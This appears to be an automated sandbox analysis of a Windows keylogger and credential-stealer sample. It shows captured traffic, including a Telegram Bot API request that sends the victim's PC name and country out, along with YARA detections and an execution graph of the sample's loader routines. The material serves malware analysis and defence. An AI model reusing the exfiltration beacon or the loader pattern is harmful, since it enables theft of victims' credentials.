                                                                                                                      2024-11-10 20:44:11 UTC63OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2024-11-10 20:44:11 UTC846INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 10 Nov 2024 20:44:11 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 359
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 51656
                                                                                                                      Last-Modified: Sun, 10 Nov 2024 06:23:15 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9q%2BjrFv5QK53ElnXq3RdMz8QhfWh0CGctrnVEfzWEUGjeXDIsehX80FPXNEjCnEe2FAMidsxm6IPPVIxifsasgVTwT9B1OCl7ttkSfm8nIzNGN0mg77gCYiFGSNVTy9z0zBbvtPV"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e08e10c5fe57d5d-DFW
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1182&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2393388&cwnd=252&unsent_bytes=0&cid=101e29bbd91959e2&ts=196&x=0"
                                                                                                                      2024-11-10 20:44:11 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                                      Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      9192.168.2.449747149.154.167.2204437288C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-10 20:44:12 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20and%20Time:%2011/11/2024%20/%2005:56:38%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20364339%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                      Host: api.telegram.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-10 20:44:12 UTC344INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Sun, 10 Nov 2024 20:44:12 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 55
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-11-10 20:44:12 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                      Click to jump to process

                                                                                                                      Click to jump to process

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Target ID:0
                                                                                                                      Start time:15:43:53
                                                                                                                      Start date:10/11/2024
                                                                                                                      Path:C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:207'360 bytes
                                                                                                                      MD5 hash:C0DC27117E14576D09EEB3F5285890FD
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.4105270997.0000000002771000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:9%
                                                                                                                        Dynamic/Decrypted Code Coverage:53%
                                                                                                                        Signature Coverage:24.6%
                                                                                                                        Total number of Nodes:411
                                                                                                                        Total number of Limit Nodes:36
                                                                                                                        execution_graph 82145 219e568 82146 219e574 82145->82146 82180 61c297a 82146->82180 82186 61c2988 82146->82186 82147 219e616 82191 61cccd0 82147->82191 82195 61cccc0 82147->82195 82148 219e61d 82199 63b7fe0 82148->82199 82204 63b7fcf 82148->82204 82149 219e727 82209 6426ba9 82149->82209 82214 6426bb8 82149->82214 82150 219e83f 82219 6462678 82150->82219 82224 6462688 82150->82224 82151 219e949 82229 6462b50 82151->82229 82234 6462b40 82151->82234 82152 219e950 82239 6468b71 82152->82239 82244 6468b80 82152->82244 82153 219ea5a 82249 642fb22 82153->82249 82254 642fb28 82153->82254 82154 219eb6b 82259 6417a18 82154->82259 82264 6417a28 82154->82264 82155 219ec83 82269 641da58 82155->82269 82274 641da48 82155->82274 82156 219ed8d 82157 219ee35 82156->82157 82279 64aa748 82156->82279 82283 64aa73a 82156->82283 82181 61c2944 82180->82181 82182 61c297e 82180->82182 82183 61c2a79 82182->82183 82287 61c9578 82182->82287 82291 61c995f 82182->82291 82183->82147 82187 61c29aa 82186->82187 82188 61c2a79 82187->82188 82189 61c995f LdrInitializeThunk 82187->82189 82190 61c9578 LdrInitializeThunk 82187->82190 82188->82147 82189->82188 82190->82188 82192 61cccf2 82191->82192 82193 61c9578 LdrInitializeThunk 82192->82193 82194 61ccdbf 82192->82194 82193->82194 82194->82148 82196 61cccf2 82195->82196 82197 61c9578 LdrInitializeThunk 82196->82197 82198 61ccdbf 82196->82198 82197->82198 82198->82148 82200 63b8002 82199->82200 82201 63b8117 82200->82201 82202 61c995f LdrInitializeThunk 82200->82202 82203 61c9578 LdrInitializeThunk 82200->82203 82201->82149 82202->82201 82203->82201 82205 63b7fd8 82204->82205 82206 63b8117 82205->82206 82207 61c995f LdrInitializeThunk 82205->82207 82208 61c9578 LdrInitializeThunk 82205->82208 82206->82149 82207->82206 82208->82206 82210 6426bb6 82209->82210 82211 6426cb0 82210->82211 82212 61c995f LdrInitializeThunk 82210->82212 82213 61c9578 LdrInitializeThunk 82210->82213 82211->82150 82212->82211 82213->82211 82215 6426bbd 82214->82215 82216 6426cb0 82215->82216 82217 61c995f LdrInitializeThunk 82215->82217 82218 61c9578 LdrInitializeThunk 82215->82218 82216->82150 82217->82216 82218->82216 82223 646267d 82219->82223 82220 6462780 82220->82151 82221 61c995f LdrInitializeThunk 82221->82220 82222 61c9578 LdrInitializeThunk 82222->82220 82223->82220 82223->82221 82223->82222 82225 646268d 82224->82225 82226 6462780 82225->82226 82227 61c995f LdrInitializeThunk 82225->82227 82228 61c9578 LdrInitializeThunk 82225->82228 82226->82151 82227->82226 82228->82226 82230 6462b55 82229->82230 82231 64627b0 82230->82231 82232 61c995f LdrInitializeThunk 82230->82232 82233 61c9578 LdrInitializeThunk 82230->82233 82231->82152 82232->82231 82233->82231 82235 6462b4e 82234->82235 82236 64627b0 82235->82236 82237 61c995f LdrInitializeThunk 82235->82237 82238 61c9578 LdrInitializeThunk 82235->82238 82236->82152 82237->82236 82238->82236 82240 6468b9c 82239->82240 82241 6468c4a 82240->82241 82242 61c995f LdrInitializeThunk 82240->82242 82243 61c9578 LdrInitializeThunk 82240->82243 82241->82153 82242->82241 82243->82241 82245 6468b9c 82244->82245 82246 6468c4a 82245->82246 82247 61c995f LdrInitializeThunk 82245->82247 82248 61c9578 LdrInitializeThunk 82245->82248 82246->82153 82247->82246 82248->82246 82250 642fb4a 82249->82250 82251 642fbfd 82250->82251 82252 61c995f LdrInitializeThunk 82250->82252 82253 61c9578 LdrInitializeThunk 82250->82253 82251->82154 82252->82251 82253->82251 82255 642fb4a 82254->82255 82256 642fbfd 82255->82256 82257 61c995f LdrInitializeThunk 82255->82257 82258 61c9578 LdrInitializeThunk 82255->82258 82256->82154 82257->82256 82258->82256 82260 6417a22 82259->82260 82261 6417af2 82260->82261 82262 61c995f LdrInitializeThunk 82260->82262 82263 61c9578 LdrInitializeThunk 82260->82263 82261->82155 82262->82261 82263->82261 82265 6417a44 82264->82265 82266 6417af2 82265->82266 82267 61c995f LdrInitializeThunk 82265->82267 82268 61c9578 LdrInitializeThunk 82265->82268 82266->82155 82267->82266 82268->82266 82270 641da74 82269->82270 82271 641db22 82270->82271 82272 61c995f LdrInitializeThunk 82270->82272 82273 61c9578 LdrInitializeThunk 82270->82273 82271->82156 82272->82271 82273->82271 82275 641da52 82274->82275 82276 641db22 82275->82276 82277 61c995f LdrInitializeThunk 82275->82277 82278 61c9578 LdrInitializeThunk 82275->82278 82276->82156 82277->82276 82278->82276 82280 64aa74d 82279->82280 82295 64a9eec 82280->82295 82284 64aa748 82283->82284 82285 64a9eec GetModuleHandleW 82284->82285 82286 64aa778 82285->82286 82286->82157 82290 61c95a9 82287->82290 82288 61c970c 82288->82183 82289 61c9a9c LdrInitializeThunk 82289->82288 82290->82288 82290->82289 82293 61c9816 82291->82293 82292 61c9a9c LdrInitializeThunk 82294 61c9ab4 82292->82294 82293->82292 82294->82183 82296 64a9ef7 82295->82296 82299 64ab654 82296->82299 82298 64ac0fe 82300 64ab65f 82299->82300 82301 64acc24 82300->82301 82304 64ae4a6 82300->82304 82309 64ae4a8 82300->82309 82301->82298 82305 64ae4ab 82304->82305 82306 64ae4ed 82305->82306 82314 64ae648 82305->82314 82319 64ae658 82305->82319 82306->82301 82310 64ae4c9 82309->82310 82311 64ae4ed 82310->82311 82312 64ae648 GetModuleHandleW 82310->82312 82313 64ae658 GetModuleHandleW 82310->82313 82311->82301 82312->82311 82313->82311 82315 64ae63c 82314->82315 82316 64ae652 82314->82316 82315->82306 82318 64ae69e 82316->82318 82323 64ac87c 82316->82323 82318->82306 82320 64ae665 82319->82320 82321 64ae69e 82320->82321 82322 64ac87c GetModuleHandleW 82320->82322 82321->82306 82322->82321 82324 64ac887 82323->82324 82326 64ae710 82324->82326 82327 64ac8b0 82324->82327 82326->82326 82328 64ac8bb 82327->82328 82334 64ac8c0 82328->82334 82330 64ae77f 82338 6f840f8 82330->82338 82343 6f84110 82330->82343 82331 64ae7b9 82331->82326 82335 64ac8cb 82334->82335 82336 64afd00 82335->82336 82337 64ae4a8 GetModuleHandleW 82335->82337 82336->82330 82337->82336 82340 6f84113 82338->82340 82339 6f8414d 82339->82331 82340->82339 82349 6f84388 82340->82349 82352 6f84378 82340->82352 82344 6f8418d 82343->82344 82346 6f84141 82343->82346 82344->82331 82345 6f8414d 82345->82331 82346->82345 82347 6f84388 GetModuleHandleW 82346->82347 82348 6f84378 GetModuleHandleW 82346->82348 82347->82344 82348->82344 82356 6f843c8 82349->82356 82350 6f84392 82350->82339 82353 6f84388 82352->82353 82355 6f843c8 GetModuleHandleW 82353->82355 82354 6f84392 82354->82339 82355->82354 82357 6f8440c 82356->82357 82358 6f843e9 82356->82358 82357->82350 82358->82357 82359 6f84610 GetModuleHandleW 82358->82359 82360 6f8463d 82359->82360 82360->82350 82133 64aba98 DuplicateHandle 82134 64abb2e 82133->82134 82361 40cbf7 82362 40cc08 82361->82362 82405 40d534 HeapCreate 82362->82405 82365 40cc46 82466 41087e 71 API calls 8 library calls 82365->82466 82368 40cc4c 82369 40cc50 82368->82369 82370 40cc58 __RTC_Initialize 82368->82370 82467 40cbb4 62 API calls 3 library calls 82369->82467 82407 411a15 67 API calls 2 library calls 82370->82407 82372 40cc57 82372->82370 82374 40cc66 82375 40cc72 GetCommandLineA 82374->82375 82376 40cc6a 82374->82376 82408 412892 71 API calls 3 library calls 82375->82408 82468 40e79a 62 API calls 3 library calls 82376->82468 82379 40cc82 82469 4127d7 107 API calls 3 library calls 82379->82469 82380 40cc71 82380->82375 82382 40cc8c 82383 40cc90 82382->82383 82384 40cc98 82382->82384 82470 40e79a 62 API calls 3 library calls 82383->82470 82409 41255f 106 API calls 6 library calls 82384->82409 82387 40cc97 82387->82384 82388 40cc9d 82389 40cca1 82388->82389 82390 40cca9 82388->82390 82471 40e79a 62 API calls 3 library calls 82389->82471 82410 40e859 73 API calls 5 library calls 82390->82410 82393 40ccb0 82395 40ccb5 82393->82395 82396 40ccbc 82393->82396 82394 40cca8 82394->82390 82472 40e79a 62 API calls 3 library calls 82395->82472 82411 4019f0 OleInitialize 82396->82411 82399 40ccbb 82399->82396 82400 40ccd8 82401 40ccea 82400->82401 82473 40ea0a 62 API calls _doexit 82400->82473 82474 40ea36 62 API calls _doexit 82401->82474 82404 40ccef ___lock_fhandle 82406 40cc3a 82405->82406 82406->82365 82465 40cbb4 62 API calls 3 library calls 82406->82465 82407->82374 82408->82379 82409->82388 82410->82393 82412 401ab9 82411->82412 82475 40b99e 82412->82475 82414 401abf 82415 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 82414->82415 82442 402467 82414->82442 82416 401dc3 CloseHandle GetModuleHandleA 82415->82416 82424 401c55 82415->82424 82488 401650 82416->82488 82418 401e8b FindResourceA LoadResource LockResource SizeofResource 82490 40b84d 82418->82490 82422 401c9c CloseHandle 82422->82400 82423 401ecb _memset 82425 401efc SizeofResource 82423->82425 82424->82422 82428 401cf9 Module32Next 82424->82428 82426 401f1c 82425->82426 82427 401f5f 82425->82427 82426->82427 82546 401560 __VEC_memcpy __shift 82426->82546 82429 401f92 _memset 82427->82429 82547 401560 __VEC_memcpy __shift 82427->82547 82428->82416 82439 401d0f 82428->82439 82432 401fa2 FreeResource 82429->82432 82433 40b84d _malloc 62 API calls 82432->82433 82434 401fbb SizeofResource 82433->82434 82435 401fe5 _memset 82434->82435 82436 4020aa LoadLibraryA 82435->82436 82437 401650 82436->82437 82438 40216c GetProcAddress 82437->82438 82440 4021aa 82438->82440 82438->82442 82439->82422 82441 401dad Module32Next 82439->82441 82440->82442 82520 4018f0 82440->82520 82441->82416 82441->82439 82442->82400 82444 40243f 82444->82442 82548 40b6b5 62 API calls 2 library calls 82444->82548 82446 4021f1 82446->82444 82532 401870 82446->82532 82448 402269 VariantInit 82449 401870 75 API calls 82448->82449 82450 40228b VariantInit 82449->82450 82451 4022a7 82450->82451 82452 4022d9 SafeArrayCreate SafeArrayAccessData 82451->82452 82537 40b350 82452->82537 82455 40232c 82456 402354 SafeArrayDestroy 82455->82456 82464 40235b 82455->82464 82456->82464 82457 402392 SafeArrayCreateVector 82458 4023a4 82457->82458 82459 4023bc VariantClear VariantClear 82458->82459 82539 4019a0 82459->82539 82462 40242e 82463 4019a0 65 API calls 82462->82463 82463->82444 82464->82457 82465->82365 82466->82368 82467->82372 82468->82380 82469->82382 82470->82387 82471->82394 82472->82399 82473->82401 82474->82404 82478 40b9aa ___lock_fhandle _strnlen 82475->82478 82476 40b9b8 82549 40bfc1 62 API calls __getptd_noexit 82476->82549 82478->82476 82481 40b9ec 82478->82481 82479 40b9bd 82550 40e744 6 API calls 2 library calls 82479->82550 82551 40d6e0 62 API calls 2 library calls 82481->82551 82483 40b9cd ___lock_fhandle 82483->82414 82484 40b9f3 82552 40b917 120 API calls 3 library calls 82484->82552 82486 40b9ff 82553 40ba18 LeaveCriticalSection _doexit 82486->82553 82489 4017cc _memcpy_s 82488->82489 82489->82418 82491 40b900 82490->82491 82501 40b85f 82490->82501 82561 40d2e3 6 API calls __decode_pointer 82491->82561 82493 40b906 82562 40bfc1 62 API calls __getptd_noexit 82493->82562 82498 40b8bc RtlAllocateHeap 82498->82501 82499 40b870 82499->82501 82554 40ec4d 62 API calls 2 library calls 82499->82554 82555 40eaa2 62 API calls 7 library calls 82499->82555 82556 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 82499->82556 82501->82498 82501->82499 82502 40b8ec 82501->82502 82505 40b8f1 82501->82505 82507 401ebf 82501->82507 82557 40b7fe 62 API calls 4 library calls 82501->82557 82558 40d2e3 6 API calls __decode_pointer 82501->82558 82559 40bfc1 62 API calls __getptd_noexit 82502->82559 82560 40bfc1 62 API calls __getptd_noexit 82505->82560 82508 40af66 82507->82508 82510 40af70 82508->82510 82509 40b84d _malloc 62 API calls 82509->82510 82510->82509 82511 40af8a 82510->82511 82516 40af8c std::bad_alloc::bad_alloc 82510->82516 82563 40d2e3 6 API calls __decode_pointer 82510->82563 82511->82423 82513 40afb2 82565 40af49 62 API calls std::exception::exception 82513->82565 82515 40afbc 82566 40cd39 RaiseException 82515->82566 82516->82513 82564 40d2bd 73 API calls __cinit 82516->82564 82519 40afca 82521 401903 lstrlenA 82520->82521 82522 4018fc 82520->82522 82567 4017e0 82521->82567 82522->82446 82525 401940 GetLastError 82527 40194b MultiByteToWideChar 82525->82527 82528 40198d 82525->82528 82526 401996 82526->82446 82529 4017e0 72 API calls 82527->82529 82528->82526 82575 401030 GetLastError 82528->82575 82530 401970 MultiByteToWideChar 82529->82530 82530->82528 82533 40af66 74 API calls 82532->82533 82534 40187c 82533->82534 82535 401885 SysAllocString 82534->82535 82536 4018a4 82534->82536 82535->82536 82536->82448 82538 40231a SafeArrayUnaccessData 82537->82538 82538->82455 82540 4019aa InterlockedDecrement 82539->82540 82545 4019df VariantClear 82539->82545 82541 4019b8 82540->82541 82540->82545 82542 4019c2 SysFreeString 82541->82542 82543 4019c9 82541->82543 82541->82545 82542->82543 82579 40aec0 63 API calls 2 library calls 82543->82579 82545->82462 82546->82426 82547->82429 82548->82442 82549->82479 82551->82484 82552->82486 82553->82483 82554->82499 82555->82499 82557->82501 82558->82501 82559->82505 82560->82507 82561->82493 82562->82507 82563->82510 82564->82513 82565->82515 82566->82519 82568 4017e9 82567->82568 82572 40182d 82568->82572 82574 401844 82568->82574 82576 40b783 72 API calls 4 library calls 82568->82576 82572->82574 82577 40b6b5 62 API calls 2 library calls 82572->82577 82573 40186d MultiByteToWideChar 82573->82525 82573->82526 82574->82573 82578 40b743 62 API calls 2 library calls 82574->82578 82576->82572 82577->82574 82578->82574 82579->82545 82129 6f865b0 82130 6f86618 CreateWindowExW 82129->82130 82132 6f866d4 82130->82132 82135 64ab850 82136 64ab896 GetCurrentProcess 82135->82136 82138 64ab8e8 GetCurrentThread 82136->82138 82139 64ab8e1 82136->82139 82140 64ab91e 82138->82140 82141 64ab925 GetCurrentProcess 82138->82141 82139->82138 82140->82141 82142 64ab95b 82141->82142 82143 64ab983 GetCurrentThreadId 82142->82143 82144 64ab9b4 82143->82144 82580 62d05c 82581 62d074 82580->82581 82585 62d0ce 82581->82585 82587 6f86759 82581->82587 82594 6f834cc 82581->82594 82603 6f878b9 82581->82603 82612 6f86768 82581->82612 82588 6f867a9 82587->82588 82589 6f86762 82587->82589 82590 6f834cc CallWindowProcW 82588->82590 82592 6f834cc CallWindowProcW 82589->82592 82591 6f867ab 82590->82591 82591->82585 82593 6f867af 82592->82593 82593->82585 82595 6f834d7 82594->82595 82596 6f87929 82595->82596 82598 6f87919 82595->82598 82632 6f8754c 82596->82632 82616 6f87a50 82598->82616 82621 6f87a40 82598->82621 82626 6f87b1c 82598->82626 82599 6f87927 82604 6f878c2 82603->82604 82605 6f87929 82604->82605 82606 6f87919 82604->82606 82607 6f8754c CallWindowProcW 82605->82607 82609 6f87b1c CallWindowProcW 82606->82609 82610 6f87a50 CallWindowProcW 82606->82610 82611 6f87a40 CallWindowProcW 82606->82611 82608 6f87927 82607->82608 82608->82608 82609->82608 82610->82608 82611->82608 82613 6f8678e 82612->82613 82614 6f834cc CallWindowProcW 82613->82614 82615 6f867af 82614->82615 82615->82585 82617 6f87a64 82616->82617 82636 6f87af8 82617->82636 82640 6f87b08 82617->82640 82618 6f87af0 82618->82599 82622 6f87a50 82621->82622 82624 6f87af8 CallWindowProcW 82622->82624 82625 6f87b08 CallWindowProcW 82622->82625 82623 6f87af0 82623->82599 82624->82623 82625->82623 82627 6f87ada 82626->82627 82628 6f87b2a 82626->82628 82630 6f87af8 CallWindowProcW 82627->82630 82631 6f87b08 CallWindowProcW 82627->82631 82629 6f87af0 82629->82599 82630->82629 82631->82629 82633 6f87557 82632->82633 82634 6f88d8a CallWindowProcW 82633->82634 82635 6f88d39 82633->82635 82634->82635 82635->82599 82637 6f87b08 82636->82637 82638 6f87b19 82637->82638 82643 6f88cc2 82637->82643 82638->82618 82641 6f87b19 82640->82641 82642 6f88cc2 CallWindowProcW 82640->82642 82641->82618 82642->82641 82644 6f88cca 82643->82644 82647 6f88d2d 82643->82647 82645 6f8754c CallWindowProcW 82644->82645 82646 6f88cda 82645->82646 82646->82638 82647->82638

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 26 401ed6-401eed call 40ba30 7->26 27 401eef 7->27 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 34 401cd0-401cd4 24->34 30 401ef3-401f1a call 401300 SizeofResource 26->30 27->30 41 401f1c-401f2f 30->41 42 401f5f-401f69 30->42 35 401cf0-401cf2 34->35 36 401cd6-401cd8 34->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 45 401ce2-401cea 38->45 39->40 40->25 46 401cf9-401d09 Module32Next 40->46 47 401f33-401f5d call 401560 41->47 43 401f73-401f75 42->43 44 401f6b-401f72 42->44 48 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 43->48 49 401f77-401f8d call 401560 43->49 44->43 45->34 45->39 46->7 50 401d0f 46->50 47->42 48->5 85 4021aa-4021c0 48->85 49->48 54 401d10-401d2e call 401650 50->54 61 401d30-401d34 54->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 65 401d55-401d57 63->65 67 401d3a-401d40 64->67 68 401d4c-401d4e 64->68 65->25 69 401d5d-401d7b call 401650 65->69 67->63 71 401d42-401d4a 67->71 68->65 76 401d80-401d84 69->76 71->61 71->68 78 401da0-401da2 76->78 79 401d86-401d88 76->79 84 401da5-401da7 78->84 82 401d8a-401d90 79->82 83 401d9c-401d9e 79->83 82->78 86 401d92-401d9a 82->86 83->84 84->25 87 401dad-401dbd Module32Next 84->87 89 4021c6-4021ca 85->89 90 40246a-402470 85->90 86->76 86->83 87->7 87->54 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 